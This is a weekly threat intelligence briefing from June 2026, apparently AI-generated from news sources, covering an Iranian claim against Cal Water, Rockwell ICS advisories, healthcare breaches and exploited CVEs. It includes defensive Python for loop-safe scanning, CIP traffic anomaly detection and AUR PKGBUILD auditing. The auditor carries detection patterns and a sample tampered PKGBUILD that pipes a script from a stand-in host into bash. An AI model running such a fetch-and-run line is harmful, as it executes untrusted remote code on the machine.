Iranian Hackers Claim California Water Utility Attack as CISA Issues Five Rockwell ICS Advisories; White House Bolsters National Security Systems
Executive Summary
This week's intelligence highlights significant developments across multiple critical infrastructure sectors, with water utilities, industrial control systems, and healthcare facing elevated threat activity.
- Water Sector Alert: California Water Service (Cal Water) is actively investigating claims by Iranian-linked threat actors who assert they compromised the utility's systems. Cal Water reports no operational disruptions to water or wastewater services, but the incident underscores persistent nation-state targeting of water infrastructure.
- Industrial Control Systems: CISA released five ICS advisories on June 16 affecting Rockwell Automation products widely deployed across manufacturing, energy, and critical infrastructure sectors. Affected systems include CompactLogix, FactoryTalk Analytics PavilionX, Logix 5370 & 5570 Controllers, RSLinx, and FLEX I/O EtherNet/IP Adapters.
- Healthcare Breaches: Two significant healthcare-related incidents emerged this week. Digital health company iRhythm confirmed a ransomware-related data breach affecting patient information, while cybercrime group FulcrumSec claims to have exfiltrated 1.3TB of data from pharmaceutical giant Novo Nordisk.
- Policy Development: President Trump signed National Security Presidential Memorandum-12 (NSPM-12), establishing enhanced cybersecurity governance for National Security Systems and reestablishing the Committee on National Security Systems (CNSS).
- Active Exploitation: Multiple vulnerabilities are under active exploitation, including Fortinet FortiSandbox flaws, Cisco SD-WAN Manager (CVE-2026-20262), and LiteSpeed cPanel Plugin vulnerabilities now added to CISA's Known Exploited Vulnerabilities catalog.
Threat Landscape
Nation-State Threat Actor Activities
- Iranian Threat Actors Target Water Infrastructure: Iranian-linked hackers have claimed responsibility for an attack against California Water Service, one of the largest investor-owned water utilities in the United States. While Cal Water has stated there is no indication of operational disruptions to water and wastewater systems, the company is actively investigating the claims. This incident follows a pattern of Iranian threat actors targeting U.S. water utilities, consistent with previous campaigns against water sector SCADA systems.
- China-Linked SprySOCKS Expands to Windows: Security researchers have identified two previously undocumented Windows variants of the SprySOCKS backdoor, previously believed to be Linux-only malware. The Windows variants feature driver-based stealth capabilities and over 30 command-and-control commands. This expansion significantly broadens the threat surface for organizations that may have focused detection efforts solely on Linux environments. Government organizations in at least four countries have been targeted.
- China-Linked Actors Exploit Legacy REDCap Systems: Chinese threat actors are targeting research institutions in the United States and Canada by exploiting vulnerabilities in legacy REDCap (Research Electronic Data Capture) installations. REDCap is widely used in academic and healthcare research environments for collecting and managing research data.
- North Korean APT37 Deploys NarwhalRAT: The North Korean state-sponsored group ScarCruft (APT37) is conducting spear-phishing campaigns using fake Microsoft Account security notifications to deliver NarwhalRAT malware. The social engineering approach leverages trusted Microsoft branding to increase success rates against targeted organizations.
Ransomware and Cybercriminal Developments
- DragonForce Ransomware Abuses Microsoft Teams: The DragonForce ransomware group is using custom malware named "Backdoor.Turn" to tunnel command-and-control traffic through Microsoft Teams relay infrastructure. Because the sessions are established with a Teams visitor token, the traffic looks like legitimate Teams use at the network edge, which makes it hard to separate from normal activity. The technique is a further step in ransomware operators' ability to blend into sanctioned enterprise traffic.
- FulcrumSec Claims Novo Nordisk Breach: The hack-and-leak group FulcrumSec claims to have stolen 1.3TB of data from pharmaceutical giant Novo Nordisk. The healthcare and pharmaceutical sectors continue to be high-value targets for cybercriminal groups due to the sensitivity of patient data and intellectual property.
- iRhythm Ransomware Incident: Digital healthcare company iRhythm Holdings confirmed a data breach discovered on June 8, with attackers demanding ransom after stealing patient personal and health information from third-party-hosted business applications.
- Imposter Scam Losses Reach Record Levels: The FTC warned that Americans lost $3.5 billion to imposter scams in 2025, with losses nearly tripling since 2020. The FBI has also noted that courier cash pickups are increasingly being used to circumvent bank transfer monitoring in cryptocurrency investment schemes.
Emerging Attack Vectors
- ClickFix Campaigns Expand: Multiple ClickFix campaigns are delivering three malware loaders—BabaDeda Loader, Lorem Ipsum Loader, and Potemkin—using fake update lures. These campaigns represent an evolution in social engineering techniques targeting end users.
- Atomic Arch Supply Chain Attack: A significant supply chain attack has compromised approximately 1,500 packages in the Arch User Repository (AUR). Arch Linux has suspended account registrations in response to the wave of malicious packages being uploaded.
- GhostTree Attack Technique: A novel technique called GhostTree abuses recursive Windows NTFS junctions (directory reparse points that point back at an ancestor directory) to turn a finite directory tree into an effectively unbounded set of valid file paths. A Microsoft Defender folder scan that keeps following the junctions may never complete, leaving malware placed in that tree unscanned.
- Steam Workshop Malware Distribution: Threat actors are abusing Steam Workshop, Valve's community content hub, to distribute malware hidden in wallpaper packages for the Wallpaper Engine application.
- JetBrains Marketplace Compromise: At least 15 malicious plugins discovered on the JetBrains Marketplace were designed to steal AI API keys from developers, highlighting the growing value of AI credentials as targets.
- Google Vertex AI SDK Vulnerability: A flaw in the Google Cloud Vertex AI SDK for Python allowed attackers to hijack machine learning model uploads via bucket squatting, potentially enabling code execution within Google's serving infrastructure.
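The cycle-safe walker below is an added example written for this briefing, not code from the GhostTree research or from Microsoft. It shows the check a scanner needs in order to survive a junction loop: track the identity (device and inode) of every directory on the current path and refuse to follow a link whose target is already an ancestor, so the loop is reported once and the scan finishes. The fixture directory, its names and its links are constructed for the demo; symlinks stand in for NTFS junctions so the example also runs on Linux, and the `max_depth` bound is an assumed second stop condition for trees that are deep but not looped.

```python
"""Cycle-safe directory walker: report symlink/junction loops instead of expanding them.

Added example (not from the original briefing). A link that points back at an ancestor turns
a finite tree into an unbounded set of valid paths, and a naive recursive scanner never
finishes. This walker records the (device, inode) identity of every directory on the path
from the root and refuses to descend into any entry whose identity is already an ancestor.
On Windows, junctions carry the directory attribute and os.stat follows them, so the same
identity check should apply; the fixture uses symlinks so it runs on Linux and macOS too.
"""
import os
import tempfile
from dataclasses import dataclass, field


def _identity(path: str) -> tuple:
    """(device, inode) of the directory *reached* through path, following links."""
    st = os.stat(path)
    return (st.st_dev, st.st_ino)


@dataclass
class WalkReport:
    files: list = field(default_factory=list)     # regular files (and dangling links) found
    loops: list = field(default_factory=list)     # (link path, target) pointing at an ancestor
    revisits: list = field(default_factory=list)  # links to a directory already scanned elsewhere
    depth_limited: int = 0                        # subtrees skipped because max_depth was reached


def safe_walk(root: str, max_depth: int = 64) -> WalkReport:
    """Walk root, following links, but never descend into the same directory twice."""
    report = WalkReport()
    root_id = _identity(root)
    visited = {root_id}

    def visit(path: str, depth: int, ancestors: frozenset) -> None:
        try:
            with os.scandir(path) as it:
                entries = sorted(it, key=lambda e: e.name)   # deterministic order
        except OSError:
            return
        for entry in entries:
            if not entry.is_dir(follow_symlinks=True):
                report.files.append(entry.path)
                continue
            try:
                ident = _identity(entry.path)
            except OSError:
                continue
            target = os.path.realpath(entry.path)
            if ident in ancestors:
                # The classic loop: a/b/back -> a. Report it, do not recurse.
                report.loops.append((entry.path, target))
                continue
            if ident in visited:
                report.revisits.append((entry.path, target))
                continue
            if depth + 1 > max_depth:
                report.depth_limited += 1
                continue
            visited.add(ident)
            visit(entry.path, depth + 1, ancestors | {ident})

    visit(root, 0, frozenset([root_id]))
    return report


def build_demo_tree() -> str:
    """Constructed fixture: a/b/f.txt, a loop a/b/back -> a, and a benign alias c -> a/b."""
    base = tempfile.mkdtemp(prefix="ghosttree_demo_")
    os.makedirs(os.path.join(base, "a", "b"))
    with open(os.path.join(base, "a", "b", "f.txt"), "w") as fh:
        fh.write("sample file\n")
    os.symlink(os.path.join(base, "a"), os.path.join(base, "a", "b", "back"), target_is_directory=True)
    os.symlink(os.path.join(base, "a", "b"), os.path.join(base, "c"), target_is_directory=True)
    return base


if __name__ == "__main__":
    root = build_demo_tree()
    rep = safe_walk(root)
    print(f"files={len(rep.files)} loops={len(rep.loops)} revisits={len(rep.revisits)}")
    for link, target in rep.loops:
        print(f"loop: {link} -> {target}")
```

Run it directly to build the fixture in a temporary directory and print the loop it found. On the same fixture, `os.walk(followlinks=True)` recurses until the path-length limit is hit; the walker here reports one loop, one revisit and one file and returns. The identity check, not the depth bound, is what defeats the loop: the depth bound only caps how far a legitimately deep tree is scanned.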
Mobile Threats
- Rokarolla Android Banking Trojan: A new Android banking trojan named Rokarolla targets 217 banking and cryptocurrency applications and supports 137 remote commands. It combines banking fraud capabilities with comprehensive device surveillance and suppresses fraud alerts so that victims are not warned.
Sector-Specific Analysis
Water & Wastewater Systems
ELEVATED THREAT LEVEL
The water sector faces heightened threat activity following Iranian hackers' claims of compromising California Water Service systems.
- Cal Water Incident: California Water Service is investigating claims by Iranian-linked threat actors. The utility serves approximately 2 million customers across California, Washington, New Mexico, Hawaii, and Texas. While Cal Water reports no operational disruptions to water or wastewater systems, the investigation is ongoing.
- Recommended Actions for Water Utilities:
- Review and validate network segmentation between IT and OT environments
- Audit remote access mechanisms and ensure multi-factor authentication is enforced
- Verify logging and monitoring capabilities for SCADA and ICS systems
- Review incident response plans specific to OT environments
- Consider engaging with WaterISAC for sector-specific threat intelligence
Energy Sector
The energy sector should note the significant Rockwell Automation ICS advisories released this week, as these products are widely deployed in power generation, transmission, and distribution environments.
- Rockwell Automation Vulnerabilities: Five CISA ICS advisories affect products commonly used in energy sector operations:
- CompactLogix controllers
- Logix 5370 & 5570 Controllers (denial of service via the Common Industrial Protocol, CIP)
- FactoryTalk Analytics PavilionX
- RSLinx communication software
- FLEX I/O EtherNet/IP Adapters
- Recommended Actions:
- Inventory all Rockwell Automation products in operational environments
- Review CISA advisories and assess applicability to deployed systems
- Prioritize patching based on exposure and criticality
- Implement network segmentation and monitoring for affected devices
Healthcare & Public Health
ELEVATED THREAT LEVEL
The healthcare sector experienced multiple significant incidents this week, with both patient data and pharmaceutical intellectual property targeted.
- iRhythm Data Breach: iRhythm Holdings confirmed attackers stole patient personal and health information from third-party-hosted business applications. The breach was discovered on June 8, and attackers have demanded ransom.
- Novo Nordisk Claimed Breach: Cybercrime group FulcrumSec claims 1.3TB of data was exfiltrated from the pharmaceutical giant. If confirmed, this could represent significant exposure of proprietary research data and potentially patient information.
- Breach Notification Concerns: A report highlights that errors in breach notification letters are causing confusion among patients, with some recipients mistaking legitimate notices for scams. Healthcare organizations should ensure breach notifications are clear, professional, and include verification mechanisms.
- Research Institution Targeting: China-linked actors are exploiting legacy REDCap installations at U.S. and Canadian research institutions, potentially compromising sensitive research data.
- Upcoming Resource: NIST and HHS OCR will host "Safeguarding Health Information: Building Assurance through HIPAA Security 2026" on September 2, 2026, providing guidance on healthcare security compliance.
Communications & Information Technology
- Supply Chain Attacks: The Atomic Arch attack affecting 1,500 AUR packages and malicious JetBrains Marketplace plugins demonstrate continued targeting of software supply chains and developer ecosystems.
- AI Infrastructure Risks: The Google Vertex AI SDK vulnerability and theft of AI API keys through malicious plugins highlight emerging risks in AI development infrastructure.
- AI Security Patching Challenges: A new report indicates that the rapid pace of AI model releases may be creating security gaps as developers must choose between performance and security.
- CHIPS Act Investment: The Department of Commerce announced a letter of intent for up to $50 million to Coherent Corp. to expand indium phosphide production, supporting domestic semiconductor supply chain resilience.
Financial Services
- Banking Trojan Threat: The Rokarolla Android trojan specifically targets 217 banking and cryptocurrency applications, combining credential theft with fraud alert suppression.
- Open Source Security Initiative: Chainguard, JPMorgan, and BNY have formed "Athena," an industry coalition to identify and remediate vulnerabilities in open source software before attackers can exploit them, with particular focus on AI-discovered vulnerabilities.
- Third-Party Risk Management: New startup Magnitude emerged with $10 million in funding to enhance third-party risk management through autonomous AI agents, reflecting continued industry focus on supply chain and vendor risk.
Transportation Systems
No significant sector-specific incidents were reported this week. However, transportation operators should note:
- Rockwell Automation ICS vulnerabilities may affect transportation control systems
- The SprySOCKS backdoor expansion to Windows increases risk for Windows-based transportation management systems
Government Facilities
- National Security Systems Memo: NSPM-12 establishes enhanced cybersecurity governance for National Security Systems, reestablishing the Committee on National Security Systems (CNSS) with clear accountability structures.
- SprySOCKS Targeting: Government organizations in at least four countries have been targeted by the Windows variants of the SprySOCKS backdoor.
Education Facilities
- Physical Security Enhancement: Illinois' Thornton Township High School District 205 announced deployment of ZeroEyes AI gun detection solution, reflecting continued investment in physical security technologies for educational facilities.
Vulnerability & Mitigation Updates
Critical Vulnerabilities Requiring Immediate Attention
| Vulnerability | Affected Products | Status | Priority |
|---|---|---|---|
| Multiple Fortinet FortiSandbox Flaws | FortiSandbox | Actively Exploited | CRITICAL |
| CVE-2026-20262 | Cisco Catalyst SD-WAN Manager | Actively Exploited | CRITICAL |
| CVE-2026-54420 | LiteSpeed cPanel Plugin | Actively Exploited - Added to KEV | CRITICAL |
| Multiple ICS Vulnerabilities | Rockwell Automation (5 products) | Advisories Released | HIGH |
Actively Exploited Vulnerabilities
- Fortinet FortiSandbox: Multiple critical vulnerabilities in Fortinet's FortiSandbox cyber threat detection platform are under active exploitation. Organizations should apply patches immediately and review logs for indicators of compromise. One vulnerability was patched just last week, highlighting the rapid weaponization timeline.
- Cisco SD-WAN Manager (CVE-2026-20262): Cisco has released security updates for a medium-severity flaw that has come under active exploitation. Despite the medium severity rating, active exploitation warrants immediate patching.
- LiteSpeed cPanel Plugin (CVE-2026-54420): CISA has added this vulnerability to the Known Exploited Vulnerabilities catalog, requiring Federal agencies to patch within three days. The flaw enables root privilege escalation.
CISA ICS Advisories (June 16, 2026)
CISA released five Industrial Control System advisories affecting Rockwell Automation products:
- ICSA-26-167-01: Rockwell Automation FactoryTalk Analytics PavilionX
- ICSA-26-167-02: Rockwell Automation RSLinx
- ICSA-26-167-03: Rockwell Automation Logix 5370 & 5570 Controllers (denial of service via CIP, the Common Industrial Protocol)
- ICSA-26-167-04: Rockwell Automation CompactLogix
- ICSA-26-167-05: Rockwell Automation FLEX I/O EtherNet/IP Adapters
Recommended Actions:
- Review each advisory for applicability to your environment
- Prioritize the Logix 5370 & 5570 denial of service vulnerability for systems where availability is critical
- Implement network segmentation to limit exposure of affected devices
- Monitor for anomalous CIP traffic patterns (EtherNet/IP on TCP/44818 and UDP/2222), such as sessions originating from hosts that are not engineering or HMI stations
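The detector below is an added example for the "monitor for anomalous CIP traffic patterns" action; it is not part of any CISA or Rockwell advisory. It reads flow records (timestamp, source, destination, protocol, port), keeps only EtherNet/IP ports, and raises three kinds of alert: CIP sessions to the controller subnet from hosts outside an allowlist of engineering and HMI stations, CIP flows involving an address outside the plant's ranges, and bursts of new CIP connections from one source, which is the shape both a scan and a denial-of-service attempt against a controller would take. The site baseline (subnets, allowlist, thresholds) and the flow records are constructed assumptions.

```python
"""Baseline-based detector for anomalous EtherNet/IP (CIP) traffic in flow logs.

Added example, not part of the original briefing or of any CISA/Rockwell advisory. The site
baseline below and SAMPLE_FLOWS are constructed assumptions for the demo; replace them with
the plant's own subnets, the hosts that really run RSLinx/Studio 5000, and real flow data.
"""
import ipaddress
from collections import defaultdict, deque
from datetime import datetime

# EtherNet/IP well-known ports: TCP 44818 explicit messaging (CIP over the encapsulation
# layer), UDP 44818 encapsulation/list-identity, UDP 2222 implicit (I/O) messaging.
ENIP_PORTS = {("tcp", 44818), ("udp", 44818), ("udp", 2222)}

# Hypothetical site baseline.
CONTROLLER_NET = ipaddress.ip_network("10.20.0.0/24")          # PLCs / FLEX I/O adapters
SITE_NETS = [ipaddress.ip_network("10.0.0.0/8")]                # everything the plant owns
ALLOWED_CIP_SOURCES = {ipaddress.ip_address("10.20.0.10"),     # engineering workstation
                       ipaddress.ip_address("10.20.0.11")}     # HMI / RSLinx host
BURST_THRESHOLD = 5      # new CIP connections from one source ...
BURST_WINDOW_S = 10      # ... within this many seconds

# Constructed sample flow log: timestamp,src,dst,proto,dport
SAMPLE_FLOWS = """\
2026-06-16T08:00:01,10.20.0.10,10.20.0.50,tcp,44818
2026-06-16T08:00:02,10.20.0.11,10.20.0.50,udp,2222
2026-06-16T08:00:05,10.10.5.23,10.20.0.50,tcp,44818
2026-06-16T08:00:06,203.0.113.7,10.20.0.51,tcp,44818
2026-06-16T08:01:00,10.10.5.23,10.20.0.50,tcp,44818
2026-06-16T08:01:01,10.10.5.23,10.20.0.51,tcp,44818
2026-06-16T08:01:02,10.10.5.23,10.20.0.52,tcp,44818
2026-06-16T08:01:03,10.10.5.23,10.20.0.53,tcp,44818
2026-06-16T08:01:04,10.10.5.23,10.20.0.54,tcp,44818
2026-06-16T08:02:00,10.20.0.10,10.20.0.50,tcp,443
"""


def parse_flows(text: str) -> list:
    """Parse CSV flow lines into (timestamp, src, dst, proto, dport) tuples."""
    flows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, proto, dport = line.split(",")
        flows.append((datetime.fromisoformat(ts), ipaddress.ip_address(src),
                      ipaddress.ip_address(dst), proto.lower(), int(dport)))
    return flows


def is_cip(flow) -> bool:
    return (flow[3], flow[4]) in ENIP_PORTS


def _on_site(addr) -> bool:
    return any(addr in net for net in SITE_NETS)


def detect(flows: list) -> list:
    """Return alerts as (rule, source, detail); each (rule, source) pair is reported once."""
    alerts, seen = [], set()

    def emit(rule, src, detail):
        key = (rule, str(src))
        if key not in seen:
            seen.add(key)
            alerts.append((rule, str(src), detail))

    recent = defaultdict(deque)   # src -> timestamps of its CIP connections in the window
    for ts, src, dst, proto, dport in sorted(filter(is_cip, flows), key=lambda f: f[0]):
        if dst in CONTROLLER_NET and src not in ALLOWED_CIP_SOURCES:
            emit("unlisted_source", src, f"{proto}/{dport} to controller {dst}")
        if not (_on_site(src) and _on_site(dst)):
            emit("off_site_peer", src, f"CIP flow with address outside plant ranges ({src} -> {dst})")
        window = recent[src]
        window.append(ts)
        while (ts - window[0]).total_seconds() > BURST_WINDOW_S:
            window.popleft()          # slide the window forward
        if len(window) >= BURST_THRESHOLD:
            emit("burst", src, f"{len(window)} CIP connections within {BURST_WINDOW_S}s")
    return alerts


if __name__ == "__main__":
    for rule, src, detail in detect(parse_flows(SAMPLE_FLOWS)):
        print(f"[{rule}] {src}: {detail}")
```

In practice the flows come from the OT firewall, a span-port sensor or NetFlow on the cell/area zone, and the allowlist should be derived from the RSLinx and Studio 5000 hosts actually in use. Tune `BURST_THRESHOLD` against a week of normal traffic before alerting on it, since some HMIs legitimately open many CIP connections at startup.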
Recommended Defensive Measures
- Microsoft Teams Security: Given DragonForce's abuse of Teams relay infrastructure, organizations should:
- Review and restrict external access to Teams
- Monitor for anomalous Teams visitor token usage
- Implement additional logging for Teams-related network traffic
- Email Security: Microsoft has stated that native email security tools are sufficient, but security experts advise caution and recommend layered email security approaches, particularly given the North Korean spear-phishing campaigns using fake Microsoft alerts.
- Zero Trust Implementation: A new analysis indicates that while zero trust architecture remains effective, most organizations implement it incorrectly. Security teams should review their zero trust implementations against established frameworks.
- Android Device Security: Given the Rokarolla trojan threat, organizations should:
- Enforce mobile device management policies
- Restrict installation of applications from unknown sources
- Consider mobile threat defense solutions for corporate devices
Resilience & Continuity Planning
Lessons Learned
- Third-Party Application Risk: The iRhythm breach, which occurred through third-party-hosted business applications, reinforces the importance of comprehensive vendor security assessments and monitoring of data stored in external systems.
- Breach Communication: Reports of confusing breach notification letters highlight the need for clear, professional communication during incident response. Organizations should test breach notification templates and include verification mechanisms for recipients.
- Detection Evasion Evolution: The GhostTree technique and DragonForce's Teams abuse demonstrate that threat actors continue to develop sophisticated evasion techniques. Security teams should regularly test detection capabilities against novel techniques.
Supply Chain Security
- Software Supply Chain: The Atomic Arch attack (1,500 packages), malicious JetBrains plugins, and Steam Workshop malware distribution highlight the breadth of supply chain attack vectors. Organizations should:
- Implement software composition analysis
- Verify package integrity before deployment
- Monitor for anomalous behavior from development tools
- Hardware Supply Chain: The CHIPS Program's $50 million investment in Coherent Corp. for indium phosphide production supports domestic semiconductor supply chain resilience.
- AI Supply Chain: The Athena coalition (Chainguard, JPMorgan, BNY) represents a proactive approach to identifying and remediating open source vulnerabilities before exploitation, with particular focus on AI-discovered flaws.
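The check below is an added example for the software supply chain actions above (verifying package integrity before deployment), prompted by the Atomic Arch AUR compromise; it is not an Arch Linux tool and not code from the incident. An AUR package is a PKGBUILD shell script that makepkg executes, so integrity verification means reading it before building: every source= entry should carry a pinned checksum rather than SKIP, the digest array should be a strong one, and the build functions should not pipe remote scripts into a shell, decode embedded payloads, write outside $srcdir and $pkgdir, or set setuid bits. The detection regexes are heuristics written for this example, and both PKGBUILDs are constructed samples that point at the reserved, non-resolving example.invalid domain.

```python
"""Pre-build review of an AUR PKGBUILD: pinned checksums and suspicious shell.

Added example, not part of the original briefing and not an Arch Linux tool. The regexes are
heuristics chosen for this example; SUSPECT_PKGBUILD and CLEAN_PKGBUILD are constructed samples.
Only plain *sums arrays are checked (architecture-specific arrays such as sha256sums_x86_64 are
left to the reader), and a SKIP on a VCS source is accepted only when it pins a #commit=.
"""
import re
import shlex

ARRAY_RE = re.compile(r"^(\w+)=\((.*?)\)", re.M | re.S)   # name=( ... ) possibly multi-line
SUMS_RE = re.compile(r"^(ck|md5|sha1|sha224|sha256|sha384|sha512|b2)sums$")
WEAK_SUMS = {"cksums", "md5sums", "sha1sums"}
VCS_PREFIXES = ("git+", "git://", "hg+", "svn+", "bzr+", "fossil+")

SUSPICIOUS = [
    ("remote_script_exec", re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("encoded_payload", re.compile(r"base64\s+(-d|--decode)\b|\beval\b")),
    ("writes_outside_staging", re.compile(r'(>>?|\btee\b)\s*"?(\$HOME|~/|/etc/|/root/)')),
    ("setuid_bit", re.compile(r"\bchmod\s+\S*\+s\b|\bchmod\s+[2-7]\d{3}\b")),
]

SUSPECT_PKGBUILD = """\
# Constructed sample: what a tampered AUR package might look like
pkgname=foo-bin
pkgver=1.2.3
pkgrel=2
arch=('x86_64')
source=("https://example.invalid/foo-1.2.3.tar.gz"
        "helper.sh")
sha256sums=('SKIP'
            'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855')
build() {
  cd "$srcdir"
  curl -fsSL https://example.invalid/setup.sh | bash
}
package() {
  install -Dm755 foo "$pkgdir/usr/bin/foo"
  echo "source ~/.foo" >> "$HOME/.bashrc"
}
"""

CLEAN_PKGBUILD = """\
pkgname=bar
pkgver=0.4.0
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/bar-0.4.0.tar.gz")
sha256sums=('ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad')
build() {
  cd "$srcdir/bar-0.4.0"
  make
}
package() {
  cd "$srcdir/bar-0.4.0"
  make DESTDIR="$pkgdir" install
}
"""


def parse_arrays(text: str) -> dict:
    """Extract bash arrays such as source=(...) and sha256sums=(...) as Python lists."""
    return {name: shlex.split(body) for name, body in ARRAY_RE.findall(text)}


def audit_pkgbuild(text: str) -> list:
    """Return findings as (rule, line_number_or_None, detail)."""
    findings = []
    arrays = parse_arrays(text)
    sources = arrays.get("source", [])
    sum_arrays = {k: v for k, v in arrays.items() if SUMS_RE.match(k)}

    if sources and not sum_arrays:
        findings.append(("no_checksums", None, "source= present but no *sums array"))
    for name, sums in sum_arrays.items():
        if name in WEAK_SUMS:
            findings.append(("weak_digest", None, f"{name} offers no collision resistance"))
        if len(sums) != len(sources):
            findings.append(("checksum_count_mismatch", None, f"{len(sources)} sources vs {len(sums)} {name}"))
        for src, digest in zip(sources, sums):
            if digest.upper() != "SKIP":
                continue
            url = src.split("::", 1)[-1]          # makepkg allows "filename::url"
            if url.startswith(VCS_PREFIXES):
                if "#commit=" not in url:           # a branch or tag can be moved; a commit cannot
                    findings.append(("unpinned_vcs_source", None, url))
            else:
                findings.append(("unpinned_source", None, url))

    if re.search(r"^install=", text, re.M):
        findings.append(("install_hook", None, ".install script runs as root at install time; review it"))

    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, pattern in SUSPICIOUS:
            if pattern.search(line):
                findings.append((rule, lineno, line.strip()))
    return findings


if __name__ == "__main__":
    for rule, lineno, detail in audit_pkgbuild(SUSPECT_PKGBUILD):
        where = f"line {lineno}" if lineno else "metadata"
        print(f"[{rule}] {where}: {detail}")
```

Point `audit_pkgbuild` at the text of the PKGBUILD an AUR helper has just downloaded (most helpers pause to show it, which is the moment to run the check) and treat any finding as a reason to stop and diff against the previous revision. A clean result is not proof of safety; it only rules out the lazy patterns, and a pinned checksum only proves the tarball is the one the packager intended, not that the packager's account was not hijacked.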
Cross-Sector Dependencies
- Water-Energy Nexus: The Cal Water incident serves as a reminder that water utilities depend on reliable power, and energy facilities require water for cooling. Disruption to either sector can cascade.
- Healthcare-IT Dependencies: Healthcare breaches at iRhythm and the claimed Novo Nordisk incident demonstrate the sector's reliance on IT infrastructure and third-party services.
- Research Infrastructure: China-linked targeting of REDCap installations affects both healthcare and academic research sectors, potentially compromising clinical trial data and research integrity.
Regulatory & Policy Developments
Federal Guidelines
- NSPM-12 - National Security Systems Cybersecurity: President Trump signed National Security Presidential Memorandum-12, which:
- Establishes clear governance structure for NSS cybersecurity
- Defines accountability mechanisms across agencies
- Reestablishes the Committee on National Security Systems (CNSS)
- Applies to military and intelligence community systems
International Developments
- UK Social Media Age Verification: The United Kingdom will require ID upload or facial age scanning for new social media accounts, banning users under 16. The requirement takes effect in spring 2027. Security experts have raised concerns about the data protection implications of collecting identity documents and biometric data.
- Anthropic AI Export Controls: Congressional lawmakers expressed caution regarding the Trump administration's Anthropic order, with some requesting additional information before taking positions.
AI Governance
- AI Bills of Materials (AIBOMs): A new roadmap outlines how AI bills of materials, modeled on software BOM standards, could help policymakers understand and regulate AI systems. The framework addresses what AIBOMs should include and how they might be implemented.
Training & Resource Spotlight
New Tools and Frameworks
- TrustCloud Application Risk Platform: TrustCloud offers continuous analysis of security, infrastructure, and governance data to provide CISOs with real-time application risk visibility and board-ready assurance, aiming to replace traditional security questionnaires.
- Ent Endpoint Security Platform: Ent emerged from stealth with $100 million in funding, offering an intent-aware platform designed to interpret user and agent behavior before risky actions are carried out.
- Magnitude TPRM Solution: Magnitude launched with $10 million to enhance third-party risk management through autonomous AI agents.
Industry Research
- ISSA Security Professional Survey: A new ISSA study finds that more than two-thirds of security professionals say cybersecurity is becoming harder, and many cite the growing involvement of non-security colleagues in cyber matters as part of that difficulty.
- Anonymized Infrastructure Survey: Research indicates that 94% of security incidents involve anonymized infrastructure, yet security teams remain largely reactive in their approach to this challenge.
- AI and Cybersecurity Analysis: SecurityWeek published a comprehensive analysis on AI's impact on cybersecurity, covering both defensive applications and attack enablement based on input from dozens of experts.
Professional Development
- Ethical Hacking Career Path: SecurityWeek's interview with ethical hacker Isira Adithya provides insights into building a career through bug bounty programs, from building LED bulbs to earning enough through bounties to purchase a house.
Looking Ahead: Upcoming Events
Workshops and Conferences
- June 22, 2026 - NIST Workshop on Hardware CPE and CVSS Updates: One-day workshop addressing hardware representation in Common Platform Enumeration (CPE) and how the Common Vulnerability Scoring System (CVSS) applies to hardware. Relevant for organizations managing hardware asset inventories and vulnerability management programs.
- June 25, 2026 - Iris Experts Group Annual Meeting
Disclaimer
This briefing is generated using AI analysis of public news sources. Always verify critical information through authoritative sources before taking action.